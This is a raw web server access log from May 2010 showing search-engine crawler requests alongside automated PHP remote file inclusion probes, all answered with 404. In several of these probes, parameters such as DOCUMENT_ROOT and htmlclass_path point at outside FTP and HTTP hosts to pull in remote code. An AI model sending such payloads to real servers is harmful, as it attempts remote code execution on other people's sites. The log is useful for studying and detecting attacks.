87.250.255.243 - - [08/May/2010:16:54:08 -0500] "GET /costume/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
211.115.213.66 - - [08/May/2010:16:54:22 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
211.115.213.66 - - [08/May/2010:16:54:23 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
211.115.213.66 - - [08/May/2010:16:54:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
207.46.204.193 - - [08/May/2010:16:59:20 -0500] "GET /logs/access_log.1260662400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:17:01:25 -0500] "GET /logs/access_log.1217376000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.44.82.61 - - [08/May/2010:17:09:13 -0500] "GET /logs/access_log.1219795200%20%20/phphtml.php?htmlclass_path=http://weddingvideodoneright.com/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:17:09:13 -0500] "GET /logs/phphtml.php?htmlclass_path=http://weddingvideodoneright.com/sc1? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:17:09:13 -0500] "GET /phphtml.php?htmlclass_path=http://weddingvideodoneright.com/sc1? HTTP/1.1" 404 295 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:17:09:45 -0500] "GET /logs/access_log.1214438400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:17:17:02 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:17:25:22 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:17:27:51 -0500] "GET /logs/access_log.1213142400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:17:33:42 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:17:38:54 -0500] "GET /logs/access_log.1258675200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
